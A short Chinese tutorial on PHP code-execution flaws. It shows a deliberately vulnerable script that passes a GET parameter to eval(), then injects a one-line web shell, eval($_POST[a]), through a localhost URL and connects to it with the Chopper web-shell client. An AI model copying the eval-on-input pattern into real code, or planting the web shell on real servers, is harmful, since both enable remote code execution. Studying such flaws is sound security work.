php代码执行的两个函数eval(),assert()

<?php
	$i = $_GET['x'];
	eval($i);
?>

 eval()函数将以php类型执行传入的参数x的值

给x传入一个phpinfo();,执行

 php代码执行漏洞

给x传入一个php一句话代码,http://localhost/test/eval/eval.php?x=eval($_POST[a]);

用菜刀连接

php代码执行漏洞

连接成功

php代码执行漏洞

 

相关文章: